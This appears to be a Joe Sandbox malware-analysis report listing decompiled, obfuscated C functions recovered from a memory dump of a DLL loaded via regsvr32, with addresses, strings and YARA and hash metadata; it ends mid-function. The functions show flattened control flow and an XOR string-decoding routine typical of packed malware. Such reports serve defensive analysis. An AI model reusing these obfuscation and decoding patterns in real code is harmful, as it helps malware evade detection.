								_v580 = 0xd994ba;
								_t138 = 7;
								_v580 = _v580 / _t138;
								_v580 = _v580 | 0x69ce4694;
								_v580 = _v580 >> 5;
								_v580 = _v580 ^ 0x2969fa5f;
								__eflags = _t135 - _v580;
								_t153 =  ==  ? 1 : _t153;
							} else {
								if(_t136 == 0xb9a4b55) {
									_t131 = E1000BA25();
									_t152 = _t131;
									__eflags = _t131;
									if(__eflags != 0) {
										_t136 = 0x58fbbe6;
										continue;
									}
								} else {
									if(_t136 == 0xea5d2c9) {
										_t154 = E1000FFDE(_v560, _v576,  &_v524, _v548);
										_t136 = 0xf35838d;
										continue;
									} else {
										if(_t136 != 0xf35838d) {
											goto L14;
										} else {
											_t134 = E100140AF(_v540, _v572, _v544, _t154, _v568);
											_t155 =  &(_t155[3]);
											_t135 = _t134;
											_t136 = 0x5933b46;
											continue;
										}
									}
								}
							}
						}
						L17:
						return _t153;
					}
					_t136 = 0xb9a4b55;
					L14:
					__eflags = _t136 - 0xe609d1d;
				} while (__eflags != 0);
				goto L17;
			}

0x1001ec9b
0x1001eca1
0x1001ecab
0x1001ecb3
0x1001ecbb
0x1001ecbd
0x1001ecc1
0x1001ecc9
0x1001ecce
0x1001ecd6
0x1001ecde
0x1001ece6
0x1001ecee
0x1001ecf3
0x1001ecfb
0x1001ed03
0x1001ed08
0x1001ed10
0x1001ed1f
0x1001ed22
0x1001ed26
0x1001ed2a
0x1001ed32
0x1001ed37
0x1001ed3f
0x1001ed47
0x1001ed54
0x1001ed58
0x1001ed5c
0x1001ed60
0x1001ed68
0x1001ed70
0x1001ed78
0x1001ed7d
0x1001ed85
0x1001ed8d
0x1001ed95
0x1001ed9d
0x1001eda5
0x1001edad
0x1001edba
0x1001edbe
0x1001edc6
0x1001edce
0x1001edd6
0x1001edde
0x1001ede6
0x1001edee
0x1001edf6
0x1001edfe
0x1001ee06
0x1001ee0e
0x1001ee16
0x1001ee1e
0x1001ee26
0x1001ee2e
0x1001ee36
0x1001ee36
0x1001ee48
0x1001eed5
0x1001eee8
0x1001eeed
0x1001eef0
0x1001eef2
0x1001eef4
0x00000000
0x1001eef4
0x1001ee4e
0x1001ee54
0x1001ef11
0x1001ef21
0x1001ef24
0x1001ef2a
0x1001ef33
0x1001ef38
0x1001ef44
0x1001ef46
0x1001ee5a
0x1001ee60
0x1001eec0
0x1001eec5
0x1001eec7
0x1001eec9
0x1001eecb
0x00000000
0x1001eecb
0x1001ee62
0x1001ee68
0x1001eeb0
0x1001eeb2
0x00000000
0x1001ee6a
0x1001ee70
0x00000000
0x1001ee76
0x1001ee87
0x1001ee8c
0x1001ee8f
0x1001ee91
0x00000000
0x1001ee91
0x1001ee70
0x1001ee68
0x1001ee60
0x1001ee54
0x1001ef4a
0x1001ef55
0x1001ef55
0x1001eefe
0x1001ef03
0x1001ef03
0x1001ef03
0x00000000

Strings

0m, xrefs: 1001EDAD

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0m
API String ID: 0-141868938
Opcode ID: 8a22b2d3af64f7d7f4201eb2d76618b4acfb61e57114fb6bba3496eddc773e83
Instruction ID: b8adbf271e0d20aec7d0136e89a489b7bea89f50856acc13b20efcc623231d57
Opcode Fuzzy Hash: 8a22b2d3af64f7d7f4201eb2d76618b4acfb61e57114fb6bba3496eddc773e83
Instruction Fuzzy Hash: 296155715083429FC398CF61C48541FBBE1FBC8798F104A1EF5969A260D7B0CA498F87

Uniqueness

Uniqueness Score: -1.00%

Function 1000D899 Relevance: 1.4, Strings: 1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1000D899(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char _v96;
				char _v616;
				void* _t110;
				signed int _t114;
				void* _t120;
				void* _t129;
				void* _t130;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t110);
				_v60 = _v60 & 0x00000000;
				_v64 = 0xb81801;
				_t130 = _t129 + 0xc;
				_v36 = 0x43f598;
				_t120 = 0x55aa19f;
				_v36 = _v36 | 0xa480e9f7;
				_v36 = _v36 ^ 0xa4c3fdff;
				_v32 = 0x814a57;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0x0a52b810;
				_v16 = 0x18d0f0;
				_v16 = _v16 * 0x47;
				_v16 = _v16 * 0x59;
				_v16 = _v16 | 0xa0d9b52e;
				_v16 = _v16 ^ 0xe4d26a80;
				_v40 = 0xcc4384;
				_t114 = _v40 * 0x42;
				_v40 = _t114;
				_v40 = _v40 ^ 0x34a93166;
				_v24 = 0xdc203e;
				_v24 = _v24 << 8;
				_v24 = _v24 | 0xe8a97953;
				_v24 = _v24 ^ 0x33f494de;
				_v24 = _v24 ^ 0xcf5ba6ff;
				_v56 = 0xc37672;
				_v56 = _v56 | 0x038a250c;
				_v56 = _v56 ^ 0x03c899c6;
				_v48 = 0xef8c1b;
				_v48 = _v48 + 0xffffdd8c;
				_v48 = _v48 ^ 0x00e84ca2;
				_v52 = 0x61f068;
				_v52 = _v52 | 0x5266487a;
				_v52 = _v52 ^ 0x5262e5c9;
				_v8 = 0x2a59a;
				_v8 = _v8 ^ 0xbd1db110;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0xffff9c8d;
				_v8 = _v8 ^ 0x017a0ff1;
				_v28 = 0x612dae;
				_v28 = _v28 + 0xffff9c02;
				_v28 = _v28 ^ 0x816a8989;
				_v28 = _v28 ^ 0x8108085b;
				_v20 = 0x80bf4f;
				_v20 = _v20 << 2;
				_v20 = _v20 | 0xae05ad19;
				_v20 = _v20 ^ 0xe33b57a1;
				_v20 = _v20 ^ 0x4d3958f1;
				_v44 = 0x41d70f;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x1d70627c;
				_v12 = 0xcc5834;
				_v12 = _v12 + 0xffffb698;
				_v12 = _v12 << 0xe;
				_v12 = _v12 + 0xffff1ba5;
				_v12 = _v12 ^ 0x03b166d0;
				do {
					while(_t120 != 0x97a98d) {
						if(_t120 == 0x2ff552c) {
							return E1000FF02(_v28, _a4, _v20, _v44, _v12, _v36,  &_v616,  &_v96);
						}
						if(_t120 != 0x55aa19f) {
							goto L6;
						}
						_t114 = E1000B184( &_v96, _v16, _v32, _v40, _v24);
						_t130 = _t130 + 0xc;
						_t120 = 0x97a98d;
					}
					_t114 = E10011C3C( &_v616, _v56, _v48, _v52, _v8);
					_t130 = _t130 + 0x10;
					_t120 = 0x2ff552c;
					L6:
				} while (_t120 != 0xe1dcb8b);
				return _t114;
			}

0x1000d8a5
0x1000d8a8
0x1000d8a9
0x1000d8aa
0x1000d8af
0x1000d8b8
0x1000d8bf
0x1000d8c2
0x1000d8c9
0x1000d8cb
0x1000d8d7
0x1000d8e3
0x1000d8ea
0x1000d8ee
0x1000d8f5
0x1000d900
0x1000d907
0x1000d90a
0x1000d911
0x1000d918
0x1000d91f
0x1000d923
0x1000d926
0x1000d92d
0x1000d934
0x1000d938
0x1000d93f
0x1000d946
0x1000d94d
0x1000d954
0x1000d95b
0x1000d962
0x1000d969
0x1000d970
0x1000d977
0x1000d97e
0x1000d985
0x1000d98c
0x1000d993
0x1000d99a
0x1000d99e
0x1000d9a5
0x1000d9ac
0x1000d9b3
0x1000d9ba
0x1000d9c1
0x1000d9c8
0x1000d9cf
0x1000d9d3
0x1000d9da
0x1000d9e1
0x1000d9e8
0x1000d9ef
0x1000d9f3
0x1000d9fa
0x1000da01
0x1000da08
0x1000da0c
0x1000da13
0x1000da1a
0x1000da1a
0x1000da20
0x00000000
0x1000da89
0x1000da24
0x00000000
0x00000000
0x1000da35
0x1000da3a
0x1000da3d
0x1000da3d
0x1000da53
0x1000da58
0x1000da5b
0x1000da5d
0x1000da5d
0x00000000

Strings

zHfR, xrefs: 1000D97E

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: zHfR
API String ID: 0-3985489765
Opcode ID: ceb64d5fb26e196343f04442af8bb9d503489b92d656f0cc74fb065a4cded076
Instruction ID: b004f01350e89d861c6442b127c4328ed17ff21e8169b46f76bcf9b799df74a5
Opcode Fuzzy Hash: ceb64d5fb26e196343f04442af8bb9d503489b92d656f0cc74fb065a4cded076
Instruction Fuzzy Hash: 195112B1D0120AEBCF45DFE4D98A8EEFBB1FB44348F208199D51276220D3754A49CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 10005995 Relevance: 1.4, Strings: 1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10005995() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				void* _t91;
				signed int _t103;
				signed int _t104;
				void* _t106;
				signed int* _t108;

				_t108 =  &_v348;
				_v344 = 0xce4797;
				_v344 = _v344 << 6;
				_t91 = 0x49f877a;
				_v344 = _v344 * 0x56;
				_t106 = 0;
				_v344 = _v344 + 0xffff34af;
				_v344 = _v344 ^ 0x530612a5;
				_v336 = 0x1d2b9f;
				_v336 = _v336 << 0xd;
				_v336 = _v336 + 0x2cff;
				_v336 = _v336 ^ 0xa5778433;
				_v340 = 0x279bba;
				_t103 = 0x1e;
				_v340 = _v340 / _t103;
				_v340 = _v340 << 9;
				_v340 = _v340 ^ 0x02a7a478;
				_v324 = 0x1ee618;
				_v324 = _v324 ^ 0xcf9042f4;
				_v324 = _v324 ^ 0xcf8aa94d;
				_v328 = 0x19a1db;
				_t104 = 0x24;
				_v328 = _v328 * 0x3a;
				_v328 = _v328 ^ 0x7e8d1569;
				_v328 = _v328 ^ 0x7b42ebe6;
				_v332 = 0x69c4ea;
				_v332 = _v332 * 0x30;
				_v332 = _v332 ^ 0xf8cf1154;
				_v332 = _v332 ^ 0xeb10b6dc;
				_v348 = 0x3c98df;
				_v348 = _v348 / _t104;
				_v348 = _v348 | 0x5306a8a9;
				_v348 = _v348 << 5;
				_v348 = _v348 ^ 0x60f9a52a;
				do {
					while(_t91 != 0x14b48f3) {
						if(_t91 == 0x24b6f80) {
							_v284 = 0x11c;
							_t71 =  &_v336; // 0x7b42ebe6
							E1000E0EB(_v344,  *_t71, _v340,  &_v284);
							_t91 = 0x5174608;
							continue;
						} else {
							if(_t91 == 0x3f4f962) {
								_t91 = 0x14b48f3;
								_t106 = _t106 + _v276 * 0x64;
								continue;
							} else {
								if(_t91 == 0x49f877a) {
									_t91 = 0x24b6f80;
									continue;
								} else {
									if(_t91 == 0x5174608) {
										E10015C05(_v324, _v328, _v332, _v348,  &_v320);
										_t108 =  &(_t108[3]);
										_t91 = 0x7e1953e;
										continue;
									} else {
										if(_t91 == 0x7e1953e) {
											_t91 = 0x8bfcdb6;
											_t106 = _t106 + (_v2 & 0x000000ff) * 0x186a0;
											continue;
										} else {
											if(_t91 == 0x8bfcdb6) {
												_t91 = 0x3f4f962;
												_t106 = _t106 + _v280 * 0x3e8;
												continue;
											}
										}
									}
								}
							}
						}
						goto L15;
					}
					_t106 = _t106 + (_v320 & 0x0000ffff);
					_t91 = 0xfb09ce1;
					L15:
				} while (_t91 != 0xfb09ce1);
				return _t106;
			}

0x10005995
0x1000599b
0x100059a5
0x100059aa
0x100059b8
0x100059bc
0x100059be
0x100059cb
0x100059d8
0x100059e0
0x100059e5
0x100059ed
0x100059f5
0x10005a03
0x10005a08
0x10005a0e
0x10005a13
0x10005a1b
0x10005a23
0x10005a2b
0x10005a33
0x10005a40
0x10005a41
0x10005a45
0x10005a4d
0x10005a55
0x10005a62
0x10005a66
0x10005a6e
0x10005a76
0x10005a89
0x10005a8d
0x10005a95
0x10005a9a
0x10005aa2
0x10005aa2
0x10005aac
0x10005b3f
0x10005b4c
0x10005b54
0x10005b5b
0x00000000
0x10005ab2
0x10005ab4
0x10005b32
0x10005b34
0x00000000
0x10005ab6
0x10005abc
0x10005b26
0x00000000
0x10005abe
0x10005ac4
0x10005b14
0x10005b19
0x10005b1c
0x00000000
0x10005ac6
0x10005acc
0x10005af0
0x10005afb
0x00000000
0x10005ace
0x10005ad4
0x10005ae2
0x10005ae4
0x00000000
0x10005ae4
0x10005ad4
0x10005acc
0x10005ac4
0x10005abc
0x10005ab4
0x00000000
0x10005aac
0x10005b6a
0x10005b6c
0x10005b71
0x10005b71
0x10005b89

Strings

B{$, xrefs: 10005B4C

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: B{$
API String ID: 0-1421413736
Opcode ID: e20fc10a66a1483ee1332e291c206104169f7de06b707f8294b50504067f43b8
Instruction ID: 68347b5664a9325a54a5cc97c11f52e3aa945395022e273421dd706b07edff41
Opcode Fuzzy Hash: e20fc10a66a1483ee1332e291c206104169f7de06b707f8294b50504067f43b8
Instruction Fuzzy Hash: 6A41CC756083418FD318CE25D58501FFBE1FFC4788F104A2EF596A6294D3B59A0ACB87

Uniqueness

Uniqueness Score: -1.00%

Function 1001112D Relevance: 1.4, Strings: 1, Instructions: 103
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1001112D(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				char _v576;
				void* _t110;
				intOrPtr* _t112;

				_v56 = 0;
				_v8 = 0x6efbd8;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffffc203;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0x000bac86;
				_v36 = 0x49bda8;
				_v36 = _v36 | 0xa720bc22;
				_v36 = _v36 << 0xb;
				_v36 = _v36 ^ 0x4ded5000;
				_v48 = 0xe39b74;
				_v48 = _v48 << 6;
				_v48 = _v48 ^ 0x38e1260c;
				_v32 = 0xa298db;
				_v32 = _v32 >> 9;
				_v32 = _v32 ^ 0x42c67e7e;
				_v32 = _v32 ^ 0x42c1173f;
				_v24 = 0x5303c;
				_v24 = _v24 << 0xf;
				_v24 = _v24 * 0x75;
				_v24 = _v24 + 0x1c9c;
				_v24 = _v24 ^ 0x85b72e57;
				_v16 = 0xd534c9;
				_v16 = _v16 | 0x2d4a7434;
				_v16 = _v16 << 5;
				_v16 = _v16 | 0x0aae4f70;
				_v16 = _v16 ^ 0xbbe2decf;
				_v44 = 0xc9ee20;
				_v44 = _v44 >> 5;
				_v44 = _v44 ^ 0x0003c0d1;
				_v20 = 0xeb57c7;
				_v20 = _v20 + 0xffff133f;
				_v20 = _v20 | 0xa8e3b522;
				_v20 = _v20 * 0x1d;
				_v20 = _v20 ^ 0x22b57f7e;
				_v52 = 0xac1291;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x000e6607;
				_v12 = 0xfd1853;
				_v12 = _v12 + 0xffff9503;
				_v12 = _v12 << 0xc;
				_v12 = _v12 + 0xf3ea;
				_v12 = _v12 ^ 0xcad94b73;
				_v40 = 0xbda897;
				_v40 = _v40 >> 0xd;
				_v40 = _v40 ^ 0x0001fd52;
				_v28 = 0x666186;
				_v28 = _v28 + 0x178;
				_v28 = _v28 + 0xffffc9a4;
				_v28 = _v28 ^ 0x00640253;
				_t110 = E10004B09(_v48,  &_v576, _v32);
				0 = __ecx;
				if(_t110 != 0) {
					_t112 =  &_v576;
					if(_v576 != 0) {
						while( *_t112 != 0x5c) {
							_t112 = _t112 + 2;
							if( *_t112 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						 *((short*)(_t112 + 2)) = 0;
					}
					L6:
					_push(0);
					E1001683F(_v24, _v16, _v44, _v8,  &_v576, 0,  &_v56, _v20, _v52, _v12, _v36, 0, _v40, 0, _v28);
				}
				return _v56;
			}

0x1001113f
0x10011142
0x10011149
0x1001114d
0x10011159
0x1001115c
0x10011163
0x1001116a
0x10011171
0x10011175
0x1001117c
0x10011183
0x10011187
0x1001118e
0x10011195
0x10011199
0x100111a0
0x100111a7
0x100111ae
0x100111b6
0x100111b9
0x100111c0
0x100111c7
0x100111ce
0x100111d5
0x100111d9
0x100111e0
0x100111e7
0x100111ee
0x100111f2
0x100111f9
0x10011200
0x10011207
0x10011212
0x10011215
0x1001121c
0x10011223
0x10011227
0x1001122e
0x10011235
0x1001123c
0x10011240
0x10011247
0x1001124e
0x10011255
0x10011259
0x10011260
0x10011267
0x1001126e
0x10011275
0x10011282
0x10011288
0x1001128b
0x1001128d
0x1001129a
0x1001129c
0x100112a2
0x100112a8
0x00000000
0x00000000
0x100112aa
0x00000000
0x100112a8
0x100112ae
0x100112ae
0x100112b2
0x100112b2
0x100112df
0x100112e4
0x100112ee

Strings

4tJ-, xrefs: 100111CE

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4tJ-
API String ID: 0-1119652764
Opcode ID: cc0ce29b3188fc9eb4d893c7ce8424a193df29825bbb3245f7753e5fbb7800d6
Instruction ID: c170c275e11df4ad56ee7e8f1990ff963c9bd8c01ba26cb92668d3370abe4601
Opcode Fuzzy Hash: cc0ce29b3188fc9eb4d893c7ce8424a193df29825bbb3245f7753e5fbb7800d6
Instruction Fuzzy Hash: D551EEB2C0121EABCF49CFA4D94A8EEBBB1FF04304F208199D411B6260D3B95B48CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1001AFB0 Relevance: 1.4, Strings: 1, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E1001AFB0(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ecx;
				void* _t58;
				void* _t72;
				void* _t73;
				intOrPtr _t84;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10009E7D(_t58);
				_v16 = 0xccb98a;
				_t84 = 0;
				_v12 = 0xee4235;
				_v8 = 0x56be59;
				_t72 = 0x234f3c1;
				_v4 = 0;
				_v40 = 0x2287af;
				_v40 = _v40 * 0x2d;
				_v40 = _v40 * 3;
				_v40 = _v40 + 0xc857;
				_v40 = _v40 ^ 0x12321384;
				_v20 = 0xe81025;
				_v20 = _v20 | 0xdef825a6;
				_v20 = _v20 ^ 0xdef25e0c;
				_v24 = 0x2b4011;
				_v24 = _v24 ^ 0x30d8fd6c;
				_v24 = _v24 ^ 0x30f96c79;
				_v32 = 0xed29aa;
				_v32 = _v32 >> 6;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x000f4a08;
				_v36 = 0x20928b;
				_v36 = _v36 + 0xffff93ba;
				_v36 = _v36 | 0x3c2db6cf;
				_v36 = _v36 + 0xffff9a67;
				_v36 = _v36 ^ 0x3c2130c1;
				_v28 = 0xedfa0c;
				_v28 = _v28 ^ 0x1b728d53;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x00031c0e;
				do {
					while(_t72 != 0x234f3c1) {
						if(_t72 == 0x31ac4fe) {
							E10006A8D(_v36, _v28,  *0x10025088);
						} else {
							if(_t72 == 0x7d03503) {
								if(E1002225A() != 0) {
									_t72 = 0xaba3632;
									continue;
								}
							} else {
								if(_t72 == 0xaba3632) {
									_t84 = E10015031(_v24, _a12, _v32, _a8);
									if(_t84 == 0) {
										_t72 = 0xd42b056;
										continue;
									}
								} else {
									if(_t72 != 0xd42b056) {
										goto L12;
									} else {
										E1000C5C3();
										_t72 = 0x31ac4fe;
										continue;
									}
								}
							}
						}
						L15:
						return _t84;
					}
					_push(_t72);
					_t73 = 0x2c;
					 *0x10025088 = E1001EAA3(_t73);
					_t72 = 0x7d03503;
					L12:
				} while (_t72 != 0xf5aae95);
				goto L15;
			}

0x1001afb7
0x1001afbb
0x1001afbf
0x1001afc3
0x1001afc5
0x1001afca
0x1001afd2
0x1001afd4
0x1001afdf
0x1001afe7
0x1001afec
0x1001aff5
0x1001b00c
0x1001b015
0x1001b019
0x1001b021
0x1001b029
0x1001b031
0x1001b039
0x1001b041
0x1001b049
0x1001b051
0x1001b059
0x1001b061
0x1001b066
0x1001b06a
0x1001b072
0x1001b07a
0x1001b082
0x1001b08a
0x1001b092
0x1001b09a
0x1001b0a2
0x1001b0aa
0x1001b0af
0x1001b0b7
0x1001b0b7
0x1001b0c1
0x1001b13e
0x1001b0c3
0x1001b0c9
0x1001b104
0x1001b106
0x00000000
0x1001b106
0x1001b0cb
0x1001b0cd
0x1001b0f1
0x1001b0f7
0x1001b0f9
0x00000000
0x1001b0f9
0x1001b0cf
0x1001b0d1
0x00000000
0x1001b0d3
0x1001b0d3
0x1001b0d8
0x00000000
0x1001b0d8
0x1001b0d1
0x1001b0cd
0x1001b0c9
0x1001b145
0x1001b14d
0x1001b14d
0x1001b112
0x1001b115
0x1001b11c
0x1001b121
0x1001b126
0x1001b126
0x00000000

Strings

5B, xrefs: 1001AFD4

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5B
API String ID: 0-3939351174
Opcode ID: 775bcbd32e6011e807de73417e93a81c46cb85a6afdb707dd04872741243cdeb
Instruction ID: 5916f8b01ef1faa62cef04d00696654151303defa01a06a6873d47f9d59d9e24
Opcode Fuzzy Hash: 775bcbd32e6011e807de73417e93a81c46cb85a6afdb707dd04872741243cdeb
Instruction Fuzzy Hash: 0F4159761087829FC759CF50D99541FBAE0FBC8754F500A0EF5969A260C7B2D989CB83

Uniqueness

Uniqueness Score: -1.00%

Function 1001E18B Relevance: 1.3, Strings: 1, Instructions: 91
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E1001E18B(void* __ecx, void* __edx, void* __eflags) {
				void* _t44;
				signed int _t50;
				unsigned int* _t62;
				signed int _t63;
				signed int _t65;
				signed int _t66;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t79;
				signed int* _t80;
				signed int* _t81;
				signed int* _t82;
				unsigned int _t84;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_t82 =  *(_t94 + 0x20);
				_push(_t82);
				_push( *(_t94 + 0x24));
				_push( *(_t94 + 0x24));
				_push(__ecx);
				E10009E7D(_t44);
				 *(_t94 + 0x20) = 0x6e7b54;
				_t80 =  &(_t82[1]);
				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0x15cece1a;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) << 4;
				_t65 = 0x2d;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) * 0x49;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x126cfc9a;
				 *(_t94 + 0x38) = 0x2bdffd;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) << 0xf;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) / _t65;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) + 0xb6ff;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) ^ 0x0552c2f8;
				_t66 =  *_t82;
				_t81 =  &(_t80[1]);
				_t50 =  *_t80 ^ _t66;
				 *(_t94 + 0x24) = _t66;
				 *(_t94 + 0x28) = _t50;
				_t29 = _t50 + 1; // 0x10
				_t84 =  !=  ? (_t29 & 0xfffffffc) + 4 : _t29;
				_t95 = _t94 + 0x10;
				_t62 = E1001EAA3(_t84);
				 *(_t95 + 0x28) = _t62;
				if(_t62 != 0) {
					_t92 = 0;
					_t79 = _t62;
					_t90 =  >  ? 0 :  &(_t81[_t84 >> 2]) - _t81 + 3 >> 2;
					if(_t90 != 0) {
						_t63 =  *(_t95 + 0x14);
						do {
							_t72 =  *_t81;
							_t81 =  &(_t81[1]);
							_t73 = _t72 ^ _t63;
							 *_t79 = _t73;
							_t79 =  &(_t79[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t79 - 3)) = _t73 >> 8;
							 *(_t79 - 2) = _t74;
							_t92 = _t92 + 1;
							 *((char*)(_t79 - 1)) = _t74 >> 8;
						} while (_t92 < _t90);
						_t62 =  *(_t95 + 0x28);
					}
					 *((char*)(_t62 +  *((intOrPtr*)(_t95 + 0x18)))) = 0;
				}
				return _t62;
			}

0x1001e190
0x1001e195
0x1001e196
0x1001e19a
0x1001e19f
0x1001e1a0
0x1001e1a5
0x1001e1ad
0x1001e1b0
0x1001e1ba
0x1001e1c6
0x1001e1c7
0x1001e1cb
0x1001e1d3
0x1001e1db
0x1001e1e6
0x1001e1ea
0x1001e1f2
0x1001e1fa
0x1001e1fe
0x1001e201
0x1001e203
0x1001e207
0x1001e20b
0x1001e21b
0x1001e226
0x1001e230
0x1001e232
0x1001e239
0x1001e241
0x1001e243
0x1001e254
0x1001e259
0x1001e25b
0x1001e25f
0x1001e25f
0x1001e261
0x1001e264
0x1001e266
0x1001e26d
0x1001e270
0x1001e273
0x1001e276
0x1001e27c
0x1001e27d
0x1001e280
0x1001e284
0x1001e284
0x1001e28d
0x1001e28d
0x1001e299

Strings

T{n, xrefs: 1001E1A5

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: T{n
API String ID: 0-4063605532
Opcode ID: e7882b160c0bb22a4b6444dab2e077cbd430f649e0ee723eaee18d94d01ecaa9
Instruction ID: bdbef0a12c69ab345566dce4cc0b65fe8f4146bcf12f99bab906a520a12ce261
Opcode Fuzzy Hash: e7882b160c0bb22a4b6444dab2e077cbd430f649e0ee723eaee18d94d01ecaa9
Instruction Fuzzy Hash: 80318B72A093919BD304CE18C88585BFBE1FFC8758F550B6DF48AAB241C774E949CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10003F09 Relevance: 1.3, Strings: 1, Instructions: 87
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E10003F09(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t66;
				intOrPtr* _t81;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				void* _t95;

				_t95 = __ecx;
				E10009E7D(_t66);
				_v12 = 0xab65d7;
				_t84 = 0x36;
				_v12 = _v12 * 0x7c;
				_v12 = _v12 * 0x6a;
				_t85 = 0xa;
				_v12 = _v12 / _t84;
				_v12 = _v12 ^ 0x01c56882;
				_v20 = 0xd57ef;
				_t27 =  &_v20; // 0xd57ef
				_v20 =  *_t27 / _t85;
				_v20 = _v20 ^ 0x5e45c529;
				_v20 = _v20 ^ 0x5e4f9d42;
				_v16 = 0x5312a4;
				_t86 = 0x2a;
				_v16 = _v16 * 0x17;
				_v16 = _v16 | 0x132866ab;
				_v16 = _v16 ^ 0x1778018e;
				_v8 = 0x6f167f;
				_v8 = _v8 >> 8;
				_v8 = _v8 >> 6;
				_v8 = _v8 / _t86;
				_v8 = _v8 ^ 0x000e9e98;
				_t81 = E1001BFF0(0x11de522c, 0x199, _t86, _t86, 0x52f2836);
